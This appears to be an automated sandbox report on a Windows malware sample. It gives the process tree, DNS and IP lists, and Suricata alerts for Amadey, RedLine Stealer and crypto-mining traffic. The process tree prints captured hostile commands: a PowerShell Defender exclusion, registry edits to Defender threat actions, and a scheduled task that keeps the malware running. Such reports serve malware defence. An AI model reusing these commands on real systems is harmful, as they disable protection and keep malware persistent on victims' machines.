Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6403_us	May 31, 2024, 7:29 a.m.	May 31, 2024, 7:35 a.m.

Size	1.8MB
Type	PE32 executable (GUI) Intel 80386, for MS Windows
MD5	`f55d40b74d38f0fcea654437183a7b1e`
SHA256	`d107ed3dadd9d5544a569bd16e0c9eecee52f4f136e1def03c06de46267b4bec`
CRC32	`2087C371`
ssdeep	`24576:Nd/IWY2dGH6WZhJp44K5Yr7VeTpteCm5LpdldO9mnIBB3UEM98uEyoYudVFUNAZk:N9LY26bLJHrwptLm9avu8xTV+NiRy`
Yara	PE_Header_Zero - PE File Signature IsPE32 - (no description)

amers.exe "C:\Users\test22\AppData\Local\Temp\amers.exe"
1712
- axplont.exe "C:\Users\test22\AppData\Local\Temp\1b29d73536\axplont.exe"
  2388
  - 33333.exe "C:\Users\test22\AppData\Local\Temp\1000004001\33333.exe"
    2820
  - fileosn.exe "C:\Users\test22\AppData\Local\Temp\1000005001\fileosn.exe"
    2892
  - lumma1234.exe "C:\Users\test22\AppData\Local\Temp\1000006001\lumma1234.exe"
    2964
  - gold.exe "C:\Users\test22\AppData\Local\Temp\1000008001\gold.exe"
    3032
  - swizzzz.exe "C:\Users\test22\AppData\Local\Temp\1000009001\swizzzz.exe"
    2080
  - file300un.exe "C:\Users\test22\AppData\Local\Temp\1000020001\file300un.exe"
    508
    - powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\test22\AppData\Local\Temp\1000020001\file300un.exe" -Force
      2308
    - jsc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"
      1872
      - mpVxwmaUWkvooa27wKUZd6Do.exe "C:\Users\test22\Pictures\mpVxwmaUWkvooa27wKUZd6Do.exe"
        3052
        
        zB5wqyHN0DJjyQ0CADePMad2.exe C:\Users\test22\Documents\SimpleAdobe\zB5wqyHN0DJjyQ0CADePMad2.exe
        3036
        
        RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        3228
      - VjKwGjaJtKztciMR3QUC8xCl.exe "C:\Users\test22\Pictures\VjKwGjaJtKztciMR3QUC8xCl.exe"
        3108
        
        Install.exe .\Install.exe
        3236
        
        Install.exe .\Install.exe /NQHxdidUQs "385118" /S
        3092
        
        cmd.exe "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
        3504
        
        forfiles.exe forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
        3540
        
        cmd.exe /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
        3588
        
        reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
        3064
        
        forfiles.exe forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
        2136
        
        cmd.exe /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
        3776
        
        reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
        3876
        
        forfiles.exe forfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
        3996
        
        cmd.exe /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
        3920
        
        reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
        4012
        
        forfiles.exe forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
        3732
        
        cmd.exe /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
        884
        
        reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
        3332
        
        forfiles.exe forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
        3280
        
        cmd.exe /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
        3204
        
        powershell.exe powershell start-process -WindowStyle Hidden gpupdate.exe /force
        3388
        
        gpupdate.exe "C:\Windows\system32\gpupdate.exe" /force
        1256
  - Newoff.exe "C:\Users\test22\AppData\Local\Temp\1000031001\Newoff.exe"
    2216
    - schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN Newoff.exe /TR "C:\Users\test22\AppData\Local\Temp\1000031001\Newoff.exe" /F
      1952
    - FirstZ.exe "C:\Users\test22\AppData\Local\Temp\1000285001\FirstZ.exe"
      2912
explorer.exe C:\Windows\Explorer.EXE
1236
360TS_Setup.exe "C:\Users\test22\Pictures\360TS_Setup.exe" /c:WW.Marketator.CPI20230405 /pmode:2 /s /promo:eyJib290dGltZSI6IjciLCJtZWRhbCI6IjciLCJuZXdzIjoiMCIsIm9wZXJhIjoiNyIsIm9wZXJhX2lucyI6IjAiLCJwb3B1cCI6IjciLCJyZW1pbmRlciI6IjciLCJ1cGdyYWRlX25vdyI6IjAifQo=
3184
- 360TS_Setup.exe "C:\Program Files (x86)\1717128839_0\360TS_Setup.exe" /c:WW.Marketator.CPI20230405 /pmode:2 /s /promo:eyJib290dGltZSI6IjciLCJtZWRhbCI6IjciLCJuZXdzIjoiMCIsIm9wZXJhIjoiNyIsIm9wZXJhX2lucyI6IjAiLCJwb3B1cCI6IjciLCJyZW1pbmRlciI6IjciLCJ1cGdyYWRlX25vdyI6IjAifQo= /TSinstall
  3780
  - regsvr32.exe "C:\Windows\system32\regsvr32.exe" /s "C:\Program Files (x86)\360\Total Security\MenuEx64.dll"
    3864
    - regsvr32.exe /s "C:\Program Files (x86)\360\Total Security\MenuEx64.dll"
      2172
  - PowerSaver.exe "C:\Program Files (x86)\360\Total Security\Utils\PowerSaver.exe" /flightsigning
    3376
  - QHActiveDefense.exe "C:\Program Files (x86)\360\Total Security\safemon\QHActiveDefense.exe" /install
    2544

Name	Response	Post-Analysis Lookup
zeph-eu2.nanopool.org	A 51.195.43.17 A 51.15.61.114 A 51.210.150.92 A 51.195.138.197 A 163.172.171.111 A 51.15.89.13 A 51.68.137.186	51.68.137.186
pastebin.com	A 104.20.4.235 A 172.67.19.24 A 104.20.3.235	104.20.3.235
st.p.360safe.com	A 54.77.42.29	54.77.42.29
x1.i.lencr.org	CNAME crl.root-x1.letsencrypt.org.edgekey.net CNAME e8652.dscx.akamaiedge.net A 23.52.33.11	23.35.220.247
apps.identrust.com	A 121.254.136.9 CNAME a1952.dscq.akamai.net CNAME identrust.edgesuite.net A 121.254.136.18	23.210.247.57
dj1a9dwix5pje.cloudfront.net	A 18.64.13.203 A 18.64.13.95 A 18.64.13.69 A 18.64.13.80	18.64.13.95
ipinfo.io	A 34.117.186.192	34.117.186.192
download.winzip.com	A 23.43.165.155 A 23.43.165.153 CNAME www.winzip1.com.edgekey.net CNAME e94167.b.akamaiedge.net	23.43.165.155
orion.ts.360.com	CNAME orion.ts.360.com.awsr53.qihucdn.com A 82.145.215.156	82.145.215.152
s.360safe.com	A 54.255.136.181 A 54.254.196.234	54.255.136.181
f000.backblazeb2.com	A 104.153.233.177	104.153.233.177
api64.ipify.org	A 64.185.227.155 A 173.231.16.77 A 104.237.62.213	104.237.62.213
iup.360safe.com	CNAME d11opja9k668h0.cloudfront.net A 54.230.61.95 A 54.230.61.65 A 54.230.61.34 A 54.230.61.39	54.230.61.95
f.123654987.xyz	A 37.221.125.202	37.221.125.202
bitbucket.org	A 104.192.141.1	104.192.141.1
vk.com	A 87.240.129.133 A 87.240.132.72 A 87.240.132.78 A 87.240.137.164 A 93.186.225.194 A 87.240.132.67	87.240.132.67
tr.p.360safe.com	A 54.76.174.118	54.76.174.118
int.down.360safe.com	CNAME d3vbvejn5zrmpl.cloudfront.net A 18.244.61.37 A 18.244.61.7 A 18.244.61.79 A 18.244.61.49	18.244.61.79
gigapub.ma	A 51.75.247.100	51.75.247.100
monoblocked.com	A 45.130.41.108	45.130.41.108
sd.p.360safe.com	CNAME d29kc70vrlkws4.cloudfront.net A 13.225.129.190 A 13.225.129.65 A 13.225.129.7 A 13.225.129.154	13.225.129.154
free.360totalsecurity.com	A 54.192.175.79 CNAME d3jjfqf0ldkbgw.cloudfront.net A 54.192.175.17 A 54.192.175.109 A 54.192.175.27	54.192.175.109
xmr-eu1.nanopool.org	A 51.15.58.224 A 141.94.23.83 A 146.59.154.106 A 212.47.253.124 A 51.89.23.91 A 163.172.154.142 A 54.37.232.103 A 54.37.137.114 A 51.15.65.182 A 162.19.224.121 A 51.15.193.130	54.37.137.114
yip.su	A 104.21.79.77 A 172.67.169.89	172.67.169.89
lop.foxesjoy.com	A 172.67.159.232 A 104.21.66.124	104.21.66.124
fleur-de-lis.sbs	A 172.67.213.39 A 104.21.45.106	172.67.213.39
judgecaption.hair	A 194.54.164.123	194.54.164.123
api.myip.com	A 104.26.9.59 A 172.67.75.163 A 104.26.8.59	172.67.75.163
db-ip.com	A 104.26.5.15 A 104.26.4.15 A 172.67.75.166	104.26.4.15

IP Address	Status	Action
18.244.61.37	Active	Moloch
104.153.233.177	Active	Moloch
104.192.141.1	Active	Moloch
104.20.3.235	Active	Moloch
104.21.66.124	Active	Moloch
104.26.5.15	Active	Moloch
104.26.9.59	Active	Moloch
121.254.136.9	Active	Moloch
147.45.47.149	Active	Moloch
13.225.129.190	Active	Moloch
147.45.47.70	Active	Moloch
164.124.101.2	Active	Moloch
172.67.169.89	Active	Moloch
172.67.19.24	Active	Moloch
172.67.213.39	Active	Moloch
185.172.128.159	Active	Moloch
185.172.128.19	Active	Moloch
185.172.128.69	Active	Moloch
185.172.128.82	Active	Moloch
185.215.113.67	Active	Moloch
18.244.61.49	Active	Moloch
18.244.61.7	Active	Moloch
18.244.61.79	Active	Moloch
18.64.13.203	Active	Moloch
194.54.164.123	Active	Moloch
23.43.165.153	Active	Moloch
23.52.33.11	Active	Moloch
34.117.186.192	Active	Moloch
45.130.41.108	Active	Moloch
5.42.66.10	Active	Moloch
5.42.66.47	Active	Moloch
51.75.247.100	Active	Moloch
54.192.175.109	Active	Moloch
54.230.61.34	Active	Moloch
54.230.61.39	Active	Moloch
54.230.61.65	Active	Moloch
54.230.61.95	Active	Moloch
54.255.136.181	Active	Moloch
54.76.174.118	Active	Moloch
54.77.42.29	Active	Moloch
37.221.125.202	Active	Moloch
51.15.65.182	Active	Moloch
51.195.138.197	Active	Moloch
64.185.227.155	Active	Moloch
77.91.77.33	Active	Moloch
82.145.215.156	Active	Moloch
85.192.56.26	Active	Moloch
87.240.132.78	Active	Moloch
91.202.233.232	Active	Moloch
94.232.45.38	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
TCP 147.45.47.70:80 -> 192.168.56.103:49167	2400022	ET DROP Spamhaus DROP Listed Traffic Inbound group 23	Misc Attack
TCP 192.168.56.103:49167 -> 147.45.47.70:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 147.45.47.70:80 -> 192.168.56.103:49167	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 147.45.47.70:80 -> 192.168.56.103:49167	2016538	ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download	Potentially Bad Traffic
TCP 147.45.47.70:80 -> 192.168.56.103:49167	2021076	ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response	Potentially Bad Traffic
TCP 185.215.113.67:40960 -> 192.168.56.103:49172	2400032	ET DROP Spamhaus DROP Listed Traffic Inbound group 33	Misc Attack
TCP 192.168.56.103:49172 -> 185.215.113.67:40960	2043233	ET INFO Microsoft net.tcp Connection Initialization Activity	Potentially Bad Traffic
TCP 192.168.56.103:49177 -> 185.172.128.19:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 192.168.56.103:49179 -> 185.172.128.19:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 185.172.128.19:80 -> 192.168.56.103:49177	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 185.172.128.19:80 -> 192.168.56.103:49177	2016538	ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download	Potentially Bad Traffic
TCP 185.172.128.19:80 -> 192.168.56.103:49177	2021076	ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response	Potentially Bad Traffic
TCP 185.172.128.19:80 -> 192.168.56.103:49179	2014819	ET INFO Packed Executable Download	Misc activity
TCP 185.172.128.19:80 -> 192.168.56.103:49179	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 185.172.128.19:80 -> 192.168.56.103:49179	2016538	ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download	Potentially Bad Traffic
TCP 185.172.128.19:80 -> 192.168.56.103:49179	2021076	ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response	Potentially Bad Traffic
TCP 192.168.56.103:49172 -> 185.215.113.67:40960	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49172 -> 185.215.113.67:40960	2046045	ET MALWARE [ANY.RUN] RedLine Stealer/MetaStealer Family Related (MC-NMF Authorization)	A Network Trojan was detected
TCP 185.215.113.67:40960 -> 192.168.56.103:49172	2043234	ET MALWARE Redline Stealer TCP CnC - Id1Response	A Network Trojan was detected
TCP 192.168.56.103:49172 -> 185.215.113.67:40960	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 185.215.113.67:40960 -> 192.168.56.103:49172	2046056	ET MALWARE Redline Stealer/MetaStealer Family Activity (Response)	A Network Trojan was detected
TCP 192.168.56.103:49172 -> 185.215.113.67:40960	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49172 -> 185.215.113.67:40960	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49172 -> 185.215.113.67:40960	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49172 -> 185.215.113.67:40960	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49172 -> 185.215.113.67:40960	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49172 -> 185.215.113.67:40960	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49167 -> 147.45.47.70:80	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	A Network Trojan was detected
TCP 192.168.56.103:49172 -> 185.215.113.67:40960	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49167 -> 147.45.47.70:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 192.168.56.103:49192 -> 172.67.169.89:443	906200022	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49187 -> 23.43.165.153:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49172 -> 185.215.113.67:40960	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 5.42.66.47:80 -> 192.168.56.103:49194	2400000	ET DROP Spamhaus DROP Listed Traffic Inbound group 1	Misc Attack
TCP 51.75.247.100:443 -> 192.168.56.103:49197	2029340	ET INFO TLS Handshake Failure	Potentially Bad Traffic
TCP 192.168.56.103:49197 -> 51.75.247.100:443	906200022	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49167 -> 147.45.47.70:80	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	A Network Trojan was detected
TCP 192.168.56.103:49167 -> 147.45.47.70:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 192.168.56.103:49194 -> 5.42.66.47:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 192.168.56.103:49167 -> 147.45.47.70:80	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	A Network Trojan was detected
TCP 192.168.56.103:49167 -> 147.45.47.70:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 5.42.66.47:80 -> 192.168.56.103:49194	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 5.42.66.47:80 -> 192.168.56.103:49194	2016538	ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download	Potentially Bad Traffic
TCP 5.42.66.47:80 -> 192.168.56.103:49194	2021076	ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response	Potentially Bad Traffic
TCP 192.168.56.103:49191 -> 172.67.19.24:443	906200022	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49196 -> 54.192.175.109:443	906200022	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49167 -> 147.45.47.70:80	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	A Network Trojan was detected
TCP 192.168.56.103:49167 -> 147.45.47.70:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 192.168.56.103:49179 -> 185.172.128.19:80	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	A Network Trojan was detected
TCP 192.168.56.103:49199 -> 104.153.233.177:443	906200022	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
UDP 192.168.56.103:28333 -> 54.77.42.29:3478	2018906	ET INFO Session Traversal Utilities for NAT (STUN Binding Request obsolete rfc 3489 CHANGE-REQUEST attribute change IP flag true change port flag false)	Generic Protocol Command Decode
UDP 192.168.56.103:28333 -> 54.77.42.29:3478	2018905	ET INFO Session Traversal Utilities for NAT (STUN Binding Request obsolete rfc 3489 CHANGE-REQUEST attribute change IP flag false change port flag true)	Generic Protocol Command Decode
TCP 192.168.56.103:49167 -> 147.45.47.70:80	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	A Network Trojan was detected
TCP 192.168.56.103:49167 -> 147.45.47.70:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 192.168.56.103:49167 -> 147.45.47.70:80	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	A Network Trojan was detected
TCP 192.168.56.103:49167 -> 147.45.47.70:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 192.168.56.103:49167 -> 147.45.47.70:80	2044623	ET MALWARE Amadey Bot Activity (POST)	A Network Trojan was detected
TCP 192.168.56.103:49167 -> 147.45.47.70:80	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	A Network Trojan was detected
TCP 192.168.56.103:49183 -> 23.43.165.153:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49188 -> 23.43.165.153:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49195 -> 5.42.66.47:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 18.244.61.7:80 -> 192.168.56.103:49213	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 192.168.56.103:49172 -> 185.215.113.67:40960	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
UDP 192.168.56.103:56613 -> 164.124.101.2:53	2014169	ET DNS Query for .su TLD (Soviet Union) Often Malware Related	Potentially Bad Traffic
TCP 192.168.56.103:49193 -> 185.172.128.82:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 185.172.128.82:80 -> 192.168.56.103:49193	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 185.172.128.82:80 -> 192.168.56.103:49193	2016538	ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download	Potentially Bad Traffic
TCP 185.172.128.82:80 -> 192.168.56.103:49193	2021076	ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response	Potentially Bad Traffic
UDP 192.168.56.103:28332 -> 54.77.42.29:3478	2018904	ET INFO Session Traversal Utilities for NAT (STUN Binding Request obsolete rfc 3489 CHANGE-REQUEST attribute change IP flag false change port flag false)	Generic Protocol Command Decode
TCP 192.168.56.103:49179 -> 185.172.128.19:80	2044623	ET MALWARE Amadey Bot Activity (POST)	A Network Trojan was detected
TCP 192.168.56.103:49241 -> 104.26.9.59:443	2042969	ET INFO Observed External IP Lookup Domain in TLS SNI (api .myip .com)	Device Retrieving External IP Address Detected
TCP 192.168.56.103:49241 -> 104.26.9.59:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49241 -> 104.26.9.59:443	2042969	ET INFO Observed External IP Lookup Domain in TLS SNI (api .myip .com)	Device Retrieving External IP Address Detected
TCP 192.168.56.103:49243 -> 64.185.227.155:443	2047703	ET INFO External IP Address Lookup Domain (ipify .org) in TLS SNI	Misc activity
TCP 192.168.56.103:49243 -> 64.185.227.155:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49243 -> 64.185.227.155:443	2047703	ET INFO External IP Address Lookup Domain (ipify .org) in TLS SNI	Misc activity
UDP 192.168.56.103:64354 -> 164.124.101.2:53	2033268	ET POLICY Observed DNS Query to Coin Mining Domain (nanopool .org)	Potential Corporate Privacy Violation
TCP 5.42.66.10:80 -> 192.168.56.103:49269	2400000	ET DROP Spamhaus DROP Listed Traffic Inbound group 1	Misc Attack
TCP 192.168.56.103:49278 -> 104.21.66.124:80	2260000	SURICATA Applayer Mismatch protocol both directions	Generic Protocol Command Decode
TCP 192.168.56.103:49278 -> 104.21.66.124:80	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49254 -> 82.145.215.156:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 147.45.47.149:80 -> 192.168.56.103:49273	2400022	ET DROP Spamhaus DROP Listed Traffic Inbound group 23	Misc Attack
TCP 192.168.56.103:49285 -> 87.240.132.78:80	2260000	SURICATA Applayer Mismatch protocol both directions	Generic Protocol Command Decode
TCP 192.168.56.103:49285 -> 87.240.132.78:80	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49240 -> 85.192.56.26:80	2052789	ET MALWARE Private Loader Related Activity (GET)	A Network Trojan was detected
TCP 192.168.56.103:49270 -> 77.91.77.33:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
UDP 192.168.56.103:52004 -> 164.124.101.2:53	2047702	ET INFO External IP Lookup Domain (ipify .org) in DNS Lookup	Misc activity
TCP 192.168.56.103:49270 -> 77.91.77.33:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 192.168.56.103:49282 -> 45.130.41.108:80	2260000	SURICATA Applayer Mismatch protocol both directions	Generic Protocol Command Decode
TCP 192.168.56.103:49282 -> 45.130.41.108:80	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49286 -> 104.21.66.124:80	2260000	SURICATA Applayer Mismatch protocol both directions	Generic Protocol Command Decode
TCP 192.168.56.103:49274 -> 94.232.45.38:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 77.91.77.33:80 -> 192.168.56.103:49270	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 77.91.77.33:80 -> 192.168.56.103:49270	2021076	ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response	Potentially Bad Traffic
TCP 5.42.66.10:80 -> 192.168.56.103:49269	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 5.42.66.10:80 -> 192.168.56.103:49269	2021076	ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response	Potentially Bad Traffic
TCP 5.42.66.10:80 -> 192.168.56.103:49269	2014520	ET INFO EXE - Served Attached HTTP	Misc activity
TCP 192.168.56.103:49283 -> 104.21.66.124:80	2260000	SURICATA Applayer Mismatch protocol both directions	Generic Protocol Command Decode
TCP 192.168.56.103:49283 -> 104.21.66.124:80	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49274 -> 94.232.45.38:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 192.168.56.103:49245 -> 34.117.186.192:443	2025331	ET POLICY Possible External IP Lookup Domain Observed in SNI (ipinfo. io)	Device Retrieving External IP Address Detected
TCP 192.168.56.103:49245 -> 34.117.186.192:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49245 -> 34.117.186.192:443	2025331	ET POLICY Possible External IP Lookup Domain Observed in SNI (ipinfo. io)	Device Retrieving External IP Address Detected
TCP 185.172.128.69:80 -> 192.168.56.103:49272	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 185.172.128.69:80 -> 192.168.56.103:49272	2021076	ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response	Potentially Bad Traffic
TCP 185.172.128.69:80 -> 192.168.56.103:49272	2014520	ET INFO EXE - Served Attached HTTP	Misc activity
TCP 192.168.56.103:49284 -> 87.240.132.78:80	2260000	SURICATA Applayer Mismatch protocol both directions	Generic Protocol Command Decode
TCP 192.168.56.103:49284 -> 87.240.132.78:80	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49247 -> 104.26.5.15:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49287 -> 172.67.213.39:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 94.232.45.38:80 -> 192.168.56.103:49274	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 94.232.45.38:80 -> 192.168.56.103:49274	2021076	ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response	Potentially Bad Traffic
TCP 192.168.56.103:49245 -> 34.117.186.192:443	2025331	ET POLICY Possible External IP Lookup Domain Observed in SNI (ipinfo. io)	Device Retrieving External IP Address Detected
TCP 192.168.56.103:49297 -> 147.45.47.149:54674	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 147.45.47.149:54674 -> 192.168.56.103:49297	2014819	ET INFO Packed Executable Download	Misc activity
TCP 192.168.56.103:49291 -> 18.64.13.203:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 185.172.128.159:80 -> 192.168.56.103:49271	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 185.172.128.159:80 -> 192.168.56.103:49271	2021076	ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response	Potentially Bad Traffic
TCP 185.172.128.159:80 -> 192.168.56.103:49271	2014520	ET INFO EXE - Served Attached HTTP	Misc activity
TCP 192.168.56.103:49288 -> 45.130.41.108:80	2260000	SURICATA Applayer Mismatch protocol both directions	Generic Protocol Command Decode
